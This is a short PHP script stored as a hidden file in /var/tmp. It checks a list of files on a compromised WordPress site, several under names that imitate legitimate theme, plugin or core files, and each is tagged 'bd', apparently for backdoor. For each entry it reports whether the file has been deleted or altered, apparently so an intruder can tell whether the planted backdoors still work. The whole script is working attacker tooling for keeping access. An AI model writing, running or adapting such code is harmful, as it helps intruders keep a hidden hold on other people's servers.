File: //var/tmp/.content
<?php $r = '/home/siissa/siissadelsureste.com'; $x = ["/1557cb.php"=>"bd@@18259@@105",
"/wp-content/themes/home-1748027028/4O4.php"=>"bd@@262245@@727",
"/wp-content/plugins/gallery_1748009614/sldebar.php"=>"bd@@246650@@727",
"/45a869.php"=>"bd@@29656@@226",
"/wp-content/themes/Divi/includes/builder/plugin-compat/table-of-contents-plus.php"=>"bd@@378082@@Feature-Policy",
"/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@47397@@Large-Allocation"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');